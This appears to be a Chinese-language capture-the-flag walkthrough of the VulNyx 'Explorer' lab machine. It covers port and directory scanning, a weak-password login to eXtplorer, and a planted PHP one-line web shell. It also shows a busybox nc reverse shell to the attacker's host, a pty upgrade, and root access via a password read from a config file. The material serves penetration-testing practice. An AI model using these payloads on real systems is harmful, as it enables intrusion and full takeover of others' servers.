vulnyx-Explorer靶场渗透

  1. 攻击机上做namp局域网扫描发现靶机

    nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.145

  1. 扫描服务器开放了哪些端口,有什么服务

    nmap -sV -T4 -p- -A 192.168.23.145

开放了 80、22 端口

  1. 访问 80 端口开放的 http 服务

什么都没有,扫描其子目录

复制代码
dirsearch -u http://192.168.23.145 -x 403,404

存在/robots.txt ,访问之

http://192.168.23.145/robots.txt

存在/extplorer,访问之

  1. 网站貌似是一个框架搭建的,扫描识别其网站指纹

    whatweb -v http://192.168.23.145/extplorer

尝试弱口令 admin:admin,成功登录

extplorer 一款现代独立文件管理器,注重速度、安全性和易于部署。通过简洁的界面本地或远程管理您的文件。

https://github.com/soerennb/extplorer

https://www.extplorer.net/

  1. 给网站写一个一句话木马即可,先创建 shell.php 文件

再编辑 shell.php

写入一句话木马

复制代码
<?php system($_GET['cmd']);?>

访问一句话木马,尝试命令执行反弹 shell

复制代码
curl -sX GET "http://192.168.23.145/shell.php?cmd=id"
echo -n 'busybox nc 192.168.23.128 4444 -e /bin/sh' | jq -sRr @uri
curl -sX GET "http://192.168.23.145/shell.php?cmd=busybox%20nc%20192.168.23.128%204444%20-e%20%2Fbin%2Fsh"

kali 预先打开端口监听,得到反弹 shell

  1. 获取可交互式 shell

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    script /dev/null -c bash

使用 script 命令记录会话。通过将输出指向 /dev/null,攻击者巧妙地利用 script 开启了一个新的 Bash 进程,从而获得了交互式环境。

信息收集一下

复制代码
id
uname -a
ls /home
cat /home/user.txt

得到普通用户 flag

  1. 查看能否 sudo 提权

    sudo -l

不行。查看extplorer web 应用的配置文件得到疑似 root 用户账户密码

复制代码
ls -laR /var/www/html/extplorer/ | grep "conf*.php"
grep -iE "user|pass" /var/www/html/extplorer/config/conf.php 
cat /var/www/html//config/conf.php

使用密码 AccessGranted#1成功登录 root 用户

得到 flag

相关推荐
one day3211 分钟前
软考网络工程师第三部
网络·安全·web安全
CoCo的编程之路2 分钟前
2026 企业级 AI 编程助手全景评测:安全、规范与智能体协同
大数据·人工智能·安全·ai编程·comate·文心快码baiducomate
Languorous.5 分钟前
Linux 开关机、重启、注销命令(新手安全操作指南)
linux·运维·安全
上海云盾第一敬业销售8 分钟前
DDoS防护解决方案架构解析:保障网站安全的新利器
安全·架构·ddos
JiaWen技术圈13 分钟前
从零认识 OpenTelemetry (OTel)
运维·前端·安全
还是做不到嘛\.21 分钟前
BUUCTF在线评测(web部分题)
安全·web安全
介一安全24 分钟前
【Web安全】JWT常见安全漏洞总结
测试工具·安全·web安全·安全性测试
风途科技~27 分钟前
山体边坡安全如何守护?地表裂缝监测站实时掌握形变动态
人工智能·安全
网安小学生(兼顾数据库版)28 分钟前
主流SBOM生成工具横评:自动化、准确性与合规支持
网络·安全·自动化
@insist12332 分钟前
信息安全工程师-网站安全顶层认知:威胁、需求与防护体系框架
网络·安全·web安全